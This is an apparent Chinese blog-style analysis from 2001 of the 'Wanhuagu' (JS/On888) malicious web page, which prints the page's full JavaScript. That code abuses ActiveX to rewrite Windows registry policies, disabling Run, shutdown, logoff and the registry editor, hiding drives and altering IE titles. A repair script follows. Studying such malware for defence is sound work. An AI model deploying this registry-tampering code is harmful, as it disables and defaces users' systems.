万花谷网页病毒源码分析

原创 2001年08月14日 17:24:00
国家反病毒应急处理中心联防单位北京江民公司的反病毒应急小组最近监测到国内有心怀不轨的人到处在互连网上散发一个美丽诱人的网址"万花谷",这实际是一个恶意"陷阱",有人经不住诱惑,只用鼠标轻轻点一下,计算机就立即瘫痪了,这是有人利用Java最新技术进行破坏的又一个恶意网址。北京江民公司提醒广大上网用户注意严加防范,遇到有On888.xxx之类的网址请不要点击,并开启KVW3000的病毒实时监视防火墙进行防杀。 该病毒的技术特征: JS/On888是一个新的含有有害代码的ActiveX网页文件,它通过在一个网络地址来对计算机用户造成破坏,其破坏特性如下:  (1)用户不能正常使用WINDOWS的DOS功能程序;  (2)用户不能正常退出WINDOWS,  (3)开始菜单上的"关闭系统"、"运行"等栏目被屏蔽,防止用户重新以DOS方式启动,关闭DOS命令、关闭REGEDIT命令等。  (4)将IE的浏览器的首页和收藏夹中都加入了含有该有害网页代码的网络地址。 具体的表现形式是:  a:网络地址是:www.on888.xxx.xxx.com;  b:在IE的"收藏夹"中自动加上"万花谷"的快捷方式,网络地址是:"http://96xx.xxx.com";   下面,作者提供病毒代码的分析,及对其修复的代码:   之所以将病毒命名为JS/xxxxx,其原因就是因为它是在页面中使用了恶意的JavaScript代码:   让我们看看HTML页面是如何修改IE标题的:   首先,利用了下面这段JavaScript代码修改了HKLM/SOFTWARE/Microsoft/Internet Explorer/Main/ 和 HKCU/Software/Microsoft/Internet Explorer/Main/ 中的Window Title这个键的键值;并修改了用户的许多IE设置,如消除RUN按纽、消除关闭按纽、消除注销按纽、隐藏桌面、隐藏盘符、禁止注册表等。以下就是这个病毒的代码: document.write(""); function AddFavLnk(loc, DispName, SiteURL) { var Shor = Shl.CreateShortcut(loc + "//" + DispName +".URL"); Shor.TargetPath = SiteURL; Shor.Save(); } function f(){ try { ActiveX initialization a1=document.applets[0]; a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); a1.createInstance(); Shl = a1.GetObject(); a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}"); a1.createInstance(); FSO = a1.GetObject(); a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}"); a1.createInstance(); Net = a1.GetObject(); try { if (documents .cookies.indexOf("Chg") == -1) { //Shl.RegWrite ("HKCU//Software//Microsoft//Internet Explorer//Main//Start Page", "http://com.6to23.com/"); var expdate = new Date((new Date()).getTime() + (1)); documents .cookies="Chg=general; expires=" + expdate.toGMTString() + "; path=/;" Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//Policies //Explorer//NoRun", 01, "REG_BINARY"); //消除RUN按纽 Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//Policies //Explorer//NoClose", 01, "REG_BINARY"); //消除关闭按纽 Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//Policies //Explorer//NoLogOff", 01, "REG_BINARY"); //消除注销按纽 Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//Policies //Explorer//NoDrives", "63000000", "REG_DWORD"); //隐藏盘符 Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//Policies //System//DisableRegistryTools", "00000001", "REG_DWORD"); //禁止注册表 Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//Policies //WinOldApp//Disabled", "00000001", "REG_DWORD"); Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//Policies //WinOldApp//NoRealMode", "00000001", "REG_DWORD"); Shl.RegWrite ("HKLM//Software//Microsoft//Windows//CurrentVersion//Winlogon //LegalNoticeCaption", "您的计算机已经被http://www.cnhack.org/优化: )"); Shl.RegWrite ("HKLM//Software//Microsoft//Windows//CurrentVersion//Winlogon //LegalNoticeText", "您的计算机已经被http://www.cnhack.org/优化: )"); //设置开机提示 Shl.RegWrite ("HKLM//Software//Microsoft//Internet Explorer//Main//Window Title", "新的标题★http://com.6to23.com/ & http://www.cnhack.org/"); Shl.RegWrite ("HKCU//Software//Microsoft//Internet Explorer//Main//Window Title", "新的标题★http://com.6to23.com/ & http://www.cnhack.org/"); //设置IE标题 var expdate = new Date((new Date()).getTime() + (1)); documents .cookies="Chg=general; expires=" + expdate.toGMTString() + "; path=/;" } } catch(e) {} } catch(e) {} } function init() { setTimeout("f()", 1000); } init(); 以下是利用一段类似的JavaScript代码修复各项的键值: document.write(""); function AddFavLnk(loc, DispName, SiteURL) { var Shor = Shl.CreateShortcut(loc + "//" + DispName +".URL"); Shor.TargetPath = SiteURL; Shor.Save(); } function f(){ try { ActiveX initialization a1=document.applets[0]; a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); a1.createInstance(); Shl = a1.GetObject(); a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}"); a1.createInstance(); FSO = a1.GetObject(); a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}"); a1.createInstance(); Net = a1.GetObject(); try { if (documents .cookies.indexOf("Chg") == -1) { //Shl.RegWrite ("HKCU//Software//Microsoft//Internet Explorer//Main//Start Page", "http://com.6to23.com/"); var expdate = new Date((new Date()).getTime() + (1)); documents .cookies="Chg=general; expires=" + expdate.toGMTString() + "; path=/;" Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//Policies //Explorer//NoRun", 00, "REG_BINARY"); //修复RUN按纽 Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//Policies //Explorer//NoClose", 00, "REG_BINARY"); //修复关闭按纽 Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//Policies //Explorer//NoLogOff", 00, "REG_BINARY"); //修复注销按纽 Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//Policies //Explorer//NoDrives", "00000000", "REG_DWORD"); //取消隐藏盘符 Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//Policies //System//DisableRegistryTools", "00000000", "REG_DWORD"); //取消禁止注册表 Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//Policies //WinOldApp//Disabled", "00000001", "REG_DWORD"); Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//Policies //WinOldApp//NoRealMode", "00000001", "REG_DWORD"); Shl.RegWrite ("HKLM//Software//Microsoft//Windows//CurrentVersion//Winlogon //LegalNoticeCaption", ""); Shl.RegWrite ("HKLM//Software//Microsoft//Windows//CurrentVersion//Winlogon //LegalNoticeText", ""); //重设开机提示 Shl.RegWrite ("HKLM//Software//Microsoft//Internet Explorer//Main//Window Title", "Microsoft Internet Explorer"); Shl.RegWrite ("HKCU//Software//Microsoft//Internet Explorer//Main//Window Title", "Microsoft Internet Explorer"); //重设IE标题 var expdate = new Date((new Date()).getTime() + (1)); documents .cookies="Chg=general; expires=" + expdate.toGMTString() + "; path=/;" } } catch(e) {} } catch(e) {} } function init() { setTimeout("f()", 1000); } init(); 作者提供了以上程序,大家可以根据自己对注册表的了解自行修改,不过声明,本段代码仅供学习使用,不要将本段代码用在不正当的途径

网页病毒源代码

  • 2007年07月11日 11:36
  • 25KB
  • 下载

[160729]千恋*万花【日文硬盘版+汉化体验硬盘版】[带全CG存档+攻略+自动打开存档补丁]

品牌:ゆずソフト 发售日期:2016-07-29 原画: こぶいち むりりん 煎路 声优: 遥そら 小鳥居夕花 沢澤砂羽 佐藤みかん 夏野楓 桜川未央 由嘉鈍 山崎高 真宮ゆず西山冴希 剧本:...
  • wangzi867258173
  • wangzi867258173
  • 2016年08月27日 12:37
  • 5646

三角函数与万花尺(初稿)

书上说过,一个角θ的终边与单位圆的交点坐标为(cosθ,sinθ),我们很容易推导出角θ的终边与圆心位于原点、半径等于r的圆的交点坐标为(rcosθ,rsinθ)。当θ由0逐渐增大到2π时,我们就可以...
  • qq_38069872
  • qq_38069872
  • 2017年04月22日 21:07
  • 156

熊猫烧香病毒源码及分析

今天在OSC看到有人共享熊猫烧香的源码,用Delphi写的,真的是跨平台啊,犹对Japanese操作系统破坏最甚,字里行间留露出作者的愤青情绪啊,大体的看了下,主要是通过拷贝到Windows系统目录中...
  • zhenyu5211314
  • zhenyu5211314
  • 2014年01月10日 16:19
  • 15045

病毒分析流程总结

前段时间拜读了《恶意代码分析实战》一书,算是对整个病毒分析的流程和常用方法有个大致的了解,现在总结一下,也算是给自己做的一个笔记。         首先,病毒分析师必须具备以下知识:编程、汇编/反汇...
  • auriel
  • auriel
  • 2015年04月27日 15:48
  • 2058

勒索病毒工作原理

前些天借着Windows上的”永恒之蓝“漏洞,本来几乎快销声匿迹的加密勒索病毒又重新回到了公众视线里。由于电信等网络运营商早就封堵了可能导致中毒的445端口,所以外网影响不大,但是教育网里的同学就遭殃...
  • qmickecs
  • qmickecs
  • 2017年05月22日 13:48
  • 3047

Python 进行病毒样本特征分析

这几天一直在做有关病毒样本特征提取的工作,
  • u010484477
  • u010484477
  • 2014年06月03日 21:39
  • 1259

一个感染型的病毒逆向分析

作者:Fly2015 其实对于病毒分析人员来讲,会逆向分析汇编代码只是一个方面,一名出色的病毒分析人员不但要会分析汇编代码还要会总结病毒的行为。因为病毒分析报告是给看不懂这些汇编代码人员看的。一份好...
  • QQ1084283172
  • QQ1084283172
  • 2015年07月16日 19:21
  • 1568

u盘病毒制作教程和源码

U盘病毒制作教程 知识点: --------------------------------------------------------------- 新建文件夹的名字是: 回收站.{...
  • liujiayu2
  • liujiayu2
  • 2015年08月08日 10:23
  • 3544

网页病毒挂马原理解析

所谓的挂马,就是黑客通过各种手段,包括SQL注入,网站敏感文件扫描,服务器漏洞,网站程序0day, 等各种方法获得网站管理员账号,然后登陆网站后台,通过数据库 备份/恢复 或者上传漏洞获得一个webs...
  • bing_JavaScript
  • bing_JavaScript
  • 2016年05月05日 14:30
  • 878
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:万花谷网页病毒源码分析
举报原因:
原因补充:

(最多只允许输入30个字)